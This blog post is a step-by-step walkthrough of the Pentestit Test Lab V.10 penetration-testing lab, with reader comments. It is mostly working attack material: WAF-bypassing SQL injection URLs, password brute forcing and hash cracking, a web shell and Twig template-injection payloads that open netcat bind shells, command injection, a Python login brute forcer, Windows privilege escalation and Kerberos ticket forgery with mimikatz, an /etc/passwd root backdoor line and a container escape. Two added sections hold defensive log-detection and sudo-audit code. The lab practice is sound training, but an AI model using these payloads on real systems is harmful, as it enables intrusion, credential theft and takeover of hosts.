[PENTESTIT] Test Lab V.10

INTRODUCTION

This new Pentestit lab was really hard but really interesting for me. It simulates a real company and a real penetration test. I spent many hours learning new things and I want to thank the people who gave me hints to reach some of the tokens.

NETWORK

Network diagram: https://lab.pentestit.ru/images/labs/TL10_map.png
First of all, after connecting to the VPN, I launched nmap to discover the available ports:

nmap 192.168.101.9 -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 15:03 CET
Nmap scan report for gds.lab (192.168.101.9)
Host is up (0.077s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
443/tcp  open  https
8100/tcp open  xprint-server

Nmap done: 1 IP address (1 host up) scanned in 386.76 seconds

Browsing to http://192.168.101.9 I got a redirect to http://store.gds.lab but I couldn't resolve the hostname, so I added it to /etc/hosts:

192.168.101.9 gds.lab
192.168.101.9 store.gds.lab

Now http://store.gds.lab works. After that I checked http://gds.lab too and discovered an ownCloud page which told me to add http://cloud.gds.lab as a trusted host, so I added another line to /etc/hosts:

192.168.101.9 gds.lab
192.168.101.9 store.gds.lab
192.168.101.9 cloud.gds.lab

MAIL

I spent a lot of time on store without discovering anything. I decided to move on to http://gds.lab:443 and, analyzing the source code, I discovered this comment:

Alfred Modlin said use this template

I also found two e-mail addresses on the Contact page, so I had three e-mail addresses to test:

s.locklear@gds.lab
j.wise@gds.lab
a.modlin@gds.lab

I browsed to http://gds.lab:8100 and intercepted the login POST request with Burp Suite. I sent the request to Intruder with the following payload position marked:

POST / HTTP/1.1
Host: gds.lab:8100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://gds.lab:8100/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12655615391746434301144945042
Content-Length: 775

-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="FormCharset"

utf-8
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Username"

a.modlin
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Password"

§password§
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="SessionSkin"

*
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="login"

Enter
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Skin"

Viewpoint
-----------------------------12655615391746434301144945042--

I used john.txt as the wordlist and after some minutes I found the password: justdoit. I logged into the account and found the token! There was also an e-mail from j.wise:

Hi there!
Here is the app we talked about.
It's kinda like Google Authenticator - but the second factor is an SSH port currently opened.
So we have only one port opened for ssh at 172.16.0.1 at a time. This app will show it to you.
Please, check it on your phone for any bugs/suggestions and send them to me.

So the app can reveal the test-ssh port to us.

SITE

Now I focused on http://gds.lab:443. I discovered an SQLi on http://gds.lab:443/post.php?id=1. It seemed that a WAF was protecting the site; after some tries I found that random case could bypass it. First I retrieved the number of columns, and after some tries I discovered that there are 2:

http://gds.lab:443/post.php?id=') UNioN All SeLect CONcaT('TITLE'), CONcaT('POST')#

Remember to URL-encode the string from ') to the end.

Then I discovered the table names:

http://gds.lab:443/post.php?id=') UNioN SeLect 1, GrouP_CONcaT(TabLe_nAmE) FroM InfOrMatIoN_scHemA.TabLes WheRe TabLe_sCheMa=database()#

I got this:

posts,users 

Cool! The users table is my target. Let's discover the column names:

http://gds.lab:443/post.php?id=') UNioN SeLect 1, GrouP_CONcaT(ColUmN_nAmE) FroM InfOrMatIoN_scHemA.ColuMns WheRe TabLe_NaME='users'#

This is the output:

id,username,password 

And now the last query:

http://gds.lab:443/post.php?id=') UNioN All SeLect username, PasSwoRd FroM site.users#

Perfect! I found a username, e.lindsey, and a hash:

$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Now I need to crack it. First I identified the hash with hash-identifier: it is MD5(Unix), so I cracked it with hashcat:

optirun hashcat -a 0 -m 500 hash.txt rockyou.txt

And I got this:

lindsey123

Now I can log in to the site from /admin with the e.lindsey:lindsey123 credentials, and there I got the token.

SSH

Now I switched to ssh. With the credentials found I connected to it:

ssh e.lindsey@192.168.101.9

Searching around I found the /data folder with a /users subdirectory, but inside it I couldn't list files because I didn't have read permissions. So I tried to brute-force directory names with a bash script:

#!/bin/bash
# Usage: brutedir.sh <base path> <wordlist>
# Tests every name in the wordlist as a subdirectory of the base path.
path="$1"
list="$2"

if [ -z "$path" ] || [ ! -r "$list" ]; then
    echo "Usage: $0 <path> <wordlist>" >&2
    exit 1
fi

# Read the list line by line; the || clause also handles a last line without a newline.
while IFS='' read -r directory || [[ -n "$directory" ]]; do
    if [ -d "$path/$directory" ]; then
        printf '[+] Directory %s exists!\n' "$path/$directory"
    fi
done < "$list"

I copied it into /tmp and I typed:

chmod +x brutedir.sh
./brutedir.sh /data/users users.txt

Then I brute-forced directories for each user found, in particular:

./brutedir.sh /data/users/rross raft-large-directories-lowercase.txt

At the end I found /data/users/rross/docs and I could list the files inside the directory. Token found! I also found the SSH key of a.modlin in /data/users/a.modlin.

TEST-SSH

To reach test-ssh I need to log in to ssh and discover the hidden port. I decompiled the apk and discovered that the port changes randomly. So from the SSH box I typed:

ssh a.modlin@172.16.0.1 -p $(nmap -sT 172.16.0.1 -p 1-65535 | grep open | cut -d "/" -f 1) -i a.modlin_key

Now I am logged into test-ssh. I listed the files and I found the token.

BLOG

For blog I created an SSH tunnel:

ssh -L 8080:192.168.0.4:80 e.lindsey@192.168.101.9

Then I connected to http://localhost:8080 and a Joomla blog appeared. I searched a lot for that and finally I found this exploit which redirected me to https://github.com/XiphosResearch/exploits/tree/master/Joomraa. So I downloaded the python script and I executed it:

python joomraa.py -u reversebrain -p password -e mail@host.com http://localhost:8080

Then I logged in to the http://localhost:8080/administrator page with the credentials I had created. I navigated to articles and found an unpublished one: the token was the alias!

CAPTCHA

Again I opened an SSH tunnel:

ssh -L 8080:192.168.0.7:80 e.lindsey@192.168.101.9

Now I navigated to http://localhost:8080 and a blank image with an input form appeared. Checking /robots.txt I found this:

User-agent: *
Disallow: *.bak

Also I found /readme.txt:

Notice: don't forget - destroy all cached captcha every %time% via system.

When I tried to open the image location I got a “500 Internal Server Error”, so I tried removing .png and adding .bak but still received the same error. I then opened a private browser tab to avoid cookie problems and finally downloaded captcha.bak. I opened it with a text editor:

file_put_contents($session_path . '/captcha', serialize($_SESSION));
file_put_contents($session_path . '/($_SESSION).php', '<?php system($_GET[session]); ?>');

It contains PHP code; the second line tells me that an RCE vulnerability exists, and the backdoor is the “($_SESSION).php” file. So I closed and reopened the private tab, copied the blank image location, deleted captcha.png and added ($_SESSION).php. Then I tried http://localhost:8080/sources/e092a74ec21bca8810d8b24e4995e5bda8ba37a83576663ac6d44f1fdc108af8eafc3582b3eeb8332ba7c9bccbb7d0f5ed1ca39bdf5924b4fe1552fb57f4ffc0ac348bb77cb613a82358e31e886fc48e77c50e795963d5f2e74192428d46f5d600fd4f/($_SESSION).php?session=ls and it worked! So I created a bind shell:

http://localhost:8080/sources/e092a74ec21bca8810d8b24e4995e5bda8ba37a83576663ac6d44f1fdc108af8eafc3582b3eeb8332ba7c9bccbb7d0f5ed1ca39bdf5924b4fe1552fb57f4ffc0ac348bb77cb613a82358e31e886fc48e77c50e795963d5f2e74192428d46f5d600fd4f/($_SESSION).php?session=nc -lvp 1234 -e /bin/bash

Then I connected to the shell from SSH machine:

nc -v 192.168.0.7 1234

Going back two directories I found the token.token file.

HALL OF FAME

The next target is hall-of-fame. I created another SSH tunnel:

ssh -L 8080:192.168.0.8:80 e.lindsey@192.168.101.9

Bruteforcing directories and files I found /backup/passwords.txt:

creator:liverpool
developer:s2shj1BvYq83k6M

Logging with developer credentials I got a redirect to a page which displayed this:

$_SESSION contents:
Array ( [username] => editor [login] => editor [loggedIn] => 1 )
/dev/ password: 0bf190ffdc397fd51334d908845fbb1

So I browsed to /dev and used dev:0bf190ffdc397fd51334d908845fbb1 as credentials. Then, after many hours, I discovered an SSTI vulnerability in the hname parameter. I found a great article which explains in detail what it is. In the end I found that the template engine in use was Twig. To get a shell I requested this:

http://localhost:8080/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("nc -lvp 1234 -e /bin/bash")}}

From the SSH box I ran:

nc -v 192.168.0.8 1234

Then find the token:

find / -name "*token*" 2>/dev/null

At the end I found the location:

/usr/share/nginx/token_70f01ee6914535591d7c4c96b7004709.txt
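As an added example (mine, not code from the writeup or the lab), here is the detection logic a defender could run over web access logs to catch the three request shapes used in the SITE, CAPTCHA and HALL OF FAME sections above: the random-case UNION SELECT against post.php, the ($_SESSION).php web shell call, and the Twig SSTI in hname. The log lines are constructed, SESSIONHASH stands in for the long hash path, and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format, not from the lab) carrying the
# request shapes used in this writeup. SESSIONHASH stands in for the long hash path.
SAMPLE_LOG = r"""
10.0.0.5 - - [09/Dec/2016:12:01:02 +0100] "GET /post.php?id=%27%29%20UNioN%20All%20SeLect%20CONcaT%28%27TITLE%27%29%2C%20CONcaT%28%27POST%27%29%23 HTTP/1.1" 200 512
10.0.0.5 - - [09/Dec/2016:12:05:10 +0100] "GET /post.php?id=1 HTTP/1.1" 200 2048
10.0.0.5 - - [09/Dec/2016:12:20:33 +0100] "GET /sources/SESSIONHASH/($_SESSION).php?session=ls HTTP/1.1" 200 90
10.0.0.5 - - [09/Dec/2016:12:40:01 +0100] "GET /dev/index.php?hname=%7B%7B_self.env.registerUndefinedFilterCallback%28%22exec%22%29%7D%7D HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Rules are matched against the normalized (decoded, lower-cased) request target, so
# UNioN SeLect, UNION SELECT and %55nion all fold onto the same spelling before matching.
RULES = {
    "sqli-union": re.compile(r"\bunion\b\s+(?:all\s+)?select\b|information_schema\s*\.|group_concat\s*\("),
    "php-webshell": re.compile(r"\(\$_session\)\.php"),
    "twig-ssti": re.compile(r"\{\{.*?_self\.env\.(?:registerundefinedfiltercallback|getfilter)\s*\("),
}

def normalize(value):
    """URL-decode until stable (catches double encoding), strip /* */ comments,
    collapse whitespace and fold case."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).lower()

def classify_target(target):
    """Return the names of the rules that fire on one request target (path?query)."""
    text = normalize(target)
    return [name for name, rx in RULES.items() if rx.search(text)]

def scan_log(log):
    """Return (client ip, raw target, matched rules) for each suspicious line."""
    hits = []
    for line in log.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        tags = classify_target(m["target"])
        if tags:
            hits.append((m["ip"], m["target"], tags))
    return hits

if __name__ == "__main__":
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(ip, ",".join(tags), target)
```

Case folding and repeated decoding are what make the random-case trick visible; the real fix for the SQLi is still a parameterized query in post.php.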

NEWS

Again another SSH tunnel:

ssh -L 8080:192.168.0.5:80 e.lindsey@192.168.101.9

Playing around on the site I discovered a password reset tool and two e-mail addresses:

user@gds.lab
admin@gds.lab

First I reset the user password, then logged in with the user@gds.lab:user credentials and clicked on User Info:

Token  Your princess is in another castle!

It seems we need to log in as admin and click on User Info. Bruteforcing directories I found /old, which has login, logout and reset password links. The last one didn't work. So first I reset the admin password from the main page, then logged in to /old with the admin:admin credentials, and at the end I browsed to http://localhost:8080/user_info.php and found the token.

STORE

For store I browsed to http://store.gds.lab and I analyzed it for hours without success, then I created an SSH tunnel to dev-store:

ssh -L 8080:172.16.0.5:80 e.lindsey@192.168.101.9

It is OpenCart CMS, so I found a public exploit and I checked the SQLi:

http://localhost:8080/index.php?route=product/product&product_id=53%27

This is the output:

Fatal error: Uncaught exception 'Exception' with message 'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Error No: 1064
select * from oc_download_stats where d_id=2 and p_id=53'' in /var/www/system/library/db/mysqli.php:40 Stack trace: #0 /var/www/system/library/db.php(16): DB\MySQLi->query('select * from o...', Array) #1 /var/www/catalog/controller/product/download_stat.php(39): DB->query('select * from o...') #2 /var/www/system/storage/modification/catalog/controller/product/product.php(499): DownloadStatRecord->load('2', '53'') #3 [internal function]: ControllerProductProduct->index() #4 /var/www/system/storage/modification/system/engine/action.php(51): call_user_func_array(Array, Array) #5 /var/www/catalog/controller/startup/router.php(25): Action->execute(Object(Registry)) #6 [internal function]: ControllerStartupRouter->index() #7 /var/www/system/storage/modification/system/engine/action.php(51): cal in /var/www/system/library/db/mysqli.php on line 40

Fire up sqlmap:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id

Then I displayed all databases:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id --dbs

Select the target db and display the tables:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id -D testlab --tables

There is a token table, dump it:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id -D testlab -T token --dump

Token found!

WEB-CONTROL

First of all I connected to the SSH box and scanned the open ports:

nmap 192.168.0.6

This is the output:

Starting Nmap 6.00 ( http://nmap.org ) at 2016-12-09 12:26 MSK
Nmap scan report for 192.168.0.6
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1503/tcp open  imtc-mcs

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

So I tried to connect to port 1503:

nc 192.168.0.6 1503

A login prompt appeared. I wrote a python script to bruteforce it:

#!/usr/bin/env python3
import os
import socket
import sys

HOST, PORT = "192.168.0.6", 1503

# Check parameters
if len(sys.argv) != 3:
    sys.stderr.write("[INFO] Usage: " + sys.argv[0] + " userlist passwordlist\n")
    sys.exit(1)

# Logo
print("[INFO] Web-Control bruter\n")

# Check that both list files exist
for name, path in (("userlist", sys.argv[1]), ("passwordlist", sys.argv[2])):
    if not os.path.exists(path):
        sys.stderr.write("[ERROR] " + name + " was not found!\n")
        sys.exit(1)
print("[INFO] Loading your lists...\n")


def read_until(sock, marker):
    """Read one byte at a time until the prompt marker is seen or the peer closes."""
    data = b""
    while not data.endswith(marker):
        chunk = sock.recv(1)
        if not chunk:
            break
        data += chunk
    return data


def try_login(user, password):
    """One connection per attempt; True when the service does not answer 'Error!'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((HOST, PORT))
        read_until(s, b"Enter login: ")
        s.sendall(user.encode() + b"\n")       # newline is added here, lines are stripped below
        read_until(s, b"Enter password: ")
        s.sendall(password.encode() + b"\n")
        answer = s.recv(6)
        return b"Error!" not in answer
    finally:
        s.close()


# Load the lists once; blank lines and trailing newlines are dropped
with open(sys.argv[1]) as user_file:
    users = [u.strip() for u in user_file if u.strip()]
with open(sys.argv[2]) as password_file:
    passwords = [p.strip() for p in password_file if p.strip()]

# Bruter
print("[INFO] Start bruting...\n")
for user in users:
    for password in passwords:
        try:
            ok = try_login(user, password)
        except OSError as e:
            sys.stderr.write("[ERROR] Can't connect to host: " + str(e) + "\n")
            sys.exit(1)
        if ok:
            print("[BINGO!]\nUsername: " + user + "\nPassword: " + password)
            sys.exit(0)

I uploaded it to the SSH box with top_shortlist.txt as the user list and john.txt as the password list (I had to remove a blank line with nano to get the script to work). After some time I got the credentials:

admin:macintosh

So I logged in and this is what I got:

Select option:
    1. First script
    2. Second script
    3.Third script

To exit type -1.
Option: 

This looks like a command injection vulnerability; after some tries I typed:

1|nc -lvp 1234 -e /bin/bash

Then I opened another SSH session and I connected to the shell:

nc -v 192.168.0.6 1234

To find the token:

find / -name "*token*" 2>/dev/null

Then I found it:

/var/opt/token.txt

WIN-TERM

First of all I created an SSH proxy and I configured proxychains locally:

ssh -D 8080 e.lindsey@192.168.101.9

Then I connected to the Windows machine with rdesktop:

rdesktop -r disk:share=/home/reversebrain/share 192.168.0.3

After some tries I found credentials (default password complexity):

GDS-OFFICE\e.lindsey
Lindsey123

On the desktop there were two icons, TrueCrypt and KeePass, so I figured I had to mount the hidden volume and then open the KeePass database. I found a privilege escalation exploit, downloaded it and copied it into /home/reversebrain/share so I could transfer it to the Windows machine's Desktop from the Network panel. Then I opened cmd and typed:

cd Desktop
powershell -ExecutionPolicy Bypass
Import-Module .\exploit.ps1
Invoke-MS16-032

Now I have an elevated prompt. I changed directory to C:\Users\Administrator\Desktop, listed the files and found automount.bat. I executed it and the TrueCrypt volume was mounted. Then I opened KeePass, opened mywork_gds.kbdx from the TrueCrypt volume and, when prompted for a password, selected the key file mywork_gds.key. From the General tab I got the token and the rross cloud credentials:

rross:wwDr6rte

WIN-DC0

Now I need to exploit the Domain Controller. After some research I found a good YouTube video. From the exploited Windows machine I typed:

net user /Domain

I discovered the domain:

WIN-DC0.gds-office.lab

Now get the SID:

wmic useraccount where name="e.lindsey" get sid

This is the output:

SID
S-1-5-21-421115581-889488229-2938181853-1131

Then I switched to Kali box and I downloaded pykek. Then I typed:

sudo proxychains python ms14-068.py -u e.lindsey@gds-office.lab -p Lindsey123 -s S-1-5-21-421115581-889488229-2938181853-1131 -d 192.168.0.2

Then I uploaded mimikatz to the Windows machine, I opened the cmd, I changed directory to mimikatz and I typed:

klist purge
mimikatz.exe "Kerberos::ptc TGT_e.lindsey@gds-office.lab.ccache"

Now the ticket is injected! Let’s mount C drive:

net use \\WIN-DC0.gds-office.lab\admin$
net use K: \\WIN-DC0.gds-office.lab\C$

Now that I had mounted the C drive of WIN-DC0, I browsed to K:\Users\Administrator\Documents and found token.txt.

CLOUD

Do you remember the rross credentials? I connected to SSH with e.lindsey, then typed:

ssh rross@172.16.0.3 -p 2222

I spent a lot of time here and discovered that there are 5 LXC containers; we need to land on lxc1 to perform the privilege escalation. So log in a few times with rross from the SSH box until you get the lxc1 hostname. Now I need to escalate privileges. Check which files we can execute with root privileges:

sudo -l

This is the output:

Matching Defaults entries for rross on lxc1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rross may run the following commands on lxc1:
    (root) NOPASSWD: /opt/scripts/clear_nginx_logs.sh

There is a script that can be executed with root privileges. Let’s check if we can write into it:

ls -l /opt/scripts/clear_nginx_logs.sh

The output:

-rwxrwxrwx 1 root root 46 Dec  9 13:30 /opt/scripts/clear_nginx_logs.sh

Wow! I could write to it. From my local box I generated a password:

openssl passwd -1 -salt xyz admin

Now I edited the script and I added the following line:

echo "reversebrain:\$1\$xyz\$R7n0ak3ptkexFwuStJOw9/:0:0:reversebrain:/root:/bin/bash" >> /etc/passwd

Execute it:

sudo /opt/scripts/clear_nginx_logs.sh

Now login as root:

su reversebrain
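An added example (mine, not from the writeup or the lab): a small audit that parses sudo -l output of the shape shown above and flags targets that run as root but that a non-root user could modify, which is exactly the weakness in /opt/scripts/clear_nginx_logs.sh. The stat function is injectable so the -rwxrwxrwx root root case can be checked without the file; FakeStat and demo are my own names.

```python
import os
import re
import stat

# The sudo -l output shown above for rross on lxc1, embedded here as sample input.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for rross on lxc1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rross may run the following commands on lxc1:
    (root) NOPASSWD: /opt/scripts/clear_nginx_logs.sh
"""

# "(runas) TAG: TAG: /absolute/command" lines; entries without an absolute path are skipped.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)")

def parse_sudo_l(text):
    """Return (runas, nopasswd, command path) for every command entry in sudo -l output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m["runas"].strip(), "NOPASSWD" in m["tags"], m["cmd"]))
    return entries

def writable_by_non_root(mode, uid, gid):
    """True when a non-root user could edit the file: not owned by root,
    world-writable, or group-writable with a non-root group."""
    if uid != 0:
        return True
    if mode & stat.S_IWOTH:
        return True
    return bool(mode & stat.S_IWGRP) and gid != 0

def audit(text, stat_fn=os.stat):
    """Flag sudo targets that run as root and that a non-root user can modify.
    stat_fn is injectable so constructed metadata can be audited offline."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        if runas not in ("root", "ALL"):
            continue
        try:
            st = stat_fn(cmd)
        except OSError:
            findings.append((cmd, "target missing: check that its directory is not writable"))
            continue
        if writable_by_non_root(st.st_mode, st.st_uid, st.st_gid):
            findings.append((cmd, "writable by non-root, mode %s, nopasswd=%s"
                             % (stat.filemode(st.st_mode), nopasswd)))
    return findings

class FakeStat:
    """Minimal stand-in for os.stat_result (my helper, for offline checks)."""
    def __init__(self, mode, uid=0, gid=0):
        self.st_mode, self.st_uid, self.st_gid = mode, uid, gid

def demo():
    """Audit the writeup's entry with the mode ls -l showed: -rwxrwxrwx root root."""
    return audit(SUDO_L_OUTPUT, stat_fn=lambda path: FakeStat(stat.S_IFREG | 0o777, 0, 0))

if __name__ == "__main__":
    for cmd, why in demo():
        print("[!]", cmd, why)
```

Run it with the default os.stat on a real box to audit the actual sudoers targets; the fix on lxc1 is simply chmod 755 and root ownership on the script.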

Now I need to escape from the LXC container. I found an interesting PDF; on page 16 there is an exploit written in C, which I copied and pasted into /tmp. Now compile it (remember to add ; at the end of return 0):

gcc -g -Wall secopenchroot.c -o secopenchroot

Then execute it:

chmod +x secopenchroot
./secopenchroot /tmp "02 00 00 00 00 00 00 00"

Then I changed directory to root and got the last token!


11 thoughts on “[PENTESTIT] Test Lab V.10”

  1. ellococareloco says:

    How did you get the SID of the domain user with this command? I have tried it and it does not find it since it is in the nonlocal domain.
    wmic useraccount where name=”e.lindsey” get sid
    Probe with WHERE (name = “e.lindsey” and domain = “gds-office”) without results


  2. Makis says:

    Hello,

    I tried using your script @ Web Control (11th Challenge) but it doesn’t work. What do you mean you need to delete a blank line? Can you post it on a gist or somewhere else as code? Thanks in advance and for the beautiful guide!

    Best Regards,
    E.


      1. Makis says:

        Hmmm I used a custom wordlist as passwordlist (no blank lines) and a word list of users got from the other machines. It has the following structure (no blank lines):

        admin
        user
        a.modlin
        e.lindsey
        g.leone
        k.barth
        m.howard
        rross
        s.locklear

        Will try what you suggested though, with the mentioned wordlists


  3. Makis says:

    Hmmm I took the script as it is from your webpage, and here you can see http://pastebin.com/bShxChBB the test userlist (as already pasted) and I just try @ a password.txt file with only the 123456 password and macintosh (which is the right one – should pop [BINGO]) but I can’t get it to work.. :/ Sorry, I am not familiar with python. I execute the script as following: python login_bruteforce.py users.txt passwords.txt. Any ideas? Thanks for your time.


  4. Makis says:

    It’s okay! I am just starting to study penetration testing and your guides (here and @vulnhub) are a hell of a help. Will check back here tomorrow 🙂 Goodnight
